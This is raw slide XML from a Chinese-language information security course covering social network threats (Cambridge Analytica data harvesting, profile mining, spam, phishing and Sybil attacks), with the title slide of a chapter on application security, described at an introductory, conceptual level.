            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>被曝光，超过五千万的用户在不知情的情况下，被政治数据公司“剑桥分析（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cambridge Analytica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>）”获取并利用，意图干预美国大选。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBB03745-7B54-FE4E-A6F5-F16829515C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6561" y="945059"/>
            <a:ext cx="3807723" cy="282684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732351A9-5F0D-034C-96DF-4E4C4108DB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6562" y="4000501"/>
            <a:ext cx="3801326" cy="2536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37777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2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络安全 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{839346CE-B47F-F546-9886-B46C1138E1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835751" y="1571432"/>
            <a:ext cx="4094057" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>针对社交网络的数据挖掘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数字档案收集：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户信息可被第三方组织下载、 收集，随着不断积累，最后可以形成关于这个用户的完整档案，并用于非法用途</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>运维数据收集：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上线时长 、接入位置 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>IP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消息发送和接收、一个用户对其他用户信息的浏览等。这些数据可被用于目标定位、识 别或者向第三方转发数据等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87CF837C-8E58-BA4E-9479-198F684567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8413" y="1259053"/>
            <a:ext cx="4599364" cy="4900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9103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2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络安全 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{839346CE-B47F-F546-9886-B46C1138E1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849003" y="2035259"/>
            <a:ext cx="4160319" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>垃圾信息传播</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传统的垃圾信息攻击是通过电子邮件大量传播垃圾邮件，对于社交网络，各种垃圾信息，包括广告和恶意代码等，可以通过好友列表快速传播</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其危害主要有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>增加网络负载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信任缺失</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>身份假冒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BE1F7F4-671D-1048-AD0A-0E610365CC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44930" y="1261769"/>
            <a:ext cx="6350000" cy="4686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22871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2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络安全 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{839346CE-B47F-F546-9886-B46C1138E1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782743" y="2313555"/>
            <a:ext cx="4073670" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>社交网络的网络钓鱼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>phishing)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在社交网络中，攻击者可以伪装成为合法用户的好友，通过各种诱惑手段使得用户访问恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>由于社交网络用户为了达到结交朋友的目的，并不排斥与陌生人沟通并接受交友邀请，因此，钓鱼攻击就很容易发生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="91% of Cyber Attacks Start with a Phishing Email: Here's How to Protect  against Phishing | Digital Guardian">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A36282F-E770-FC41-821F-832B69D466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9709" y="1457739"/>
            <a:ext cx="6635241" cy="44262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59647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2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>社交网络安全 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{839346CE-B47F-F546-9886-B46C1138E1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008030" y="2552094"/>
            <a:ext cx="4073670" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>Sybil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击（女巫攻击）</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪装成为多种身份参与到正常网络中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一方面利用虚假身份盗取合法用户的各种数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>另一方面影响数据转发路径，从而可伪造出多条不同的路由，破坏网络的可用性</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4" descr="Sybil Attack, forging of multiple identities| Sybil attack defense">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD4586AF-E894-E046-B9AD-84D55A98DFC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965" b="17207"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5624444" y="1763982"/>
            <a:ext cx="6350000" cy="3139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1741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31EE29A1-C89A-8644-9C6C-B4B5595B99BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3792512" y="1264858"/>
            <a:ext cx="8399488" cy="1464125"/>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DengXian" panose="020F0502020204030204"/>
              <a:ea typeface="DengXian" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95390BD7-9E9C-0D4E-A92D-6F6196C9DABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1264858"/>
            <a:ext cx="3312826" cy="1464126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="521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DengXian" panose="020F0502020204030204"/>
              <a:ea typeface="DengXian" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="椭圆 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9CDFA6-B029-6B4C-B9E4-7CF16FFE8CAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2174129" y="965057"/>
            <a:ext cx="1960427" cy="19953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DengXian" panose="020F0502020204030204"/>
              <a:ea typeface="DengXian" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B2DA16F-243B-C34F-9814-C50B58DF6044}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2229222" y="1042635"/>
            <a:ext cx="1868643" cy="1866272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10EE77B9-CAAB-9D47-886F-1F13DC4A4E9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4745402" y="1608790"/>
            <a:ext cx="3897221" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" kern="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" kern="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" kern="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>章 应用安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1" kern="100" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light"/>
              <a:ea typeface="微软雅黑 Light"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A124E9B0-D228-D247-8DB7-D556A9DBB8CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5349841" y="3191094"/>
            <a:ext cx="387116" cy="387116"/>
            <a:chOff x="1123642" y="1900296"/>
            <a:chExt cx="687003" cy="687003"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="76200" dir="13500000" sy="23000" kx="1200000" algn="br" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="20000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Oval 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F106C430-1007-6B4E-BCEB-9CBD00951ADC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1123642" y="1900296"/>
              <a:ext cx="687003" cy="687003"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFC0FDD1-0652-5C48-88AE-4682617C87AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328245" y="2099747"/>
              <a:ext cx="277795" cy="288100"/>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grpFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B0301AD-4E54-6B47-9D1F-2112B1D36AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5808237" y="3164248"/>
            <a:ext cx="3842719" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a: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节 应用安全背景及现状</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B093A4-626E-9D44-BA75-D2F9B612F328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5349841" y="3851003"/>
            <a:ext cx="387116" cy="387116"/>
            <a:chOff x="1123642" y="1900296"/>
            <a:chExt cx="687003" cy="687003"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="76200" dir="13500000" sy="23000" kx="1200000" algn="br" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="20000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Oval 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3B8FEF6-21F2-0A40-B23D-BA32D7DD3463}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1123642" y="1900296"/>
              <a:ext cx="687003" cy="687003"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
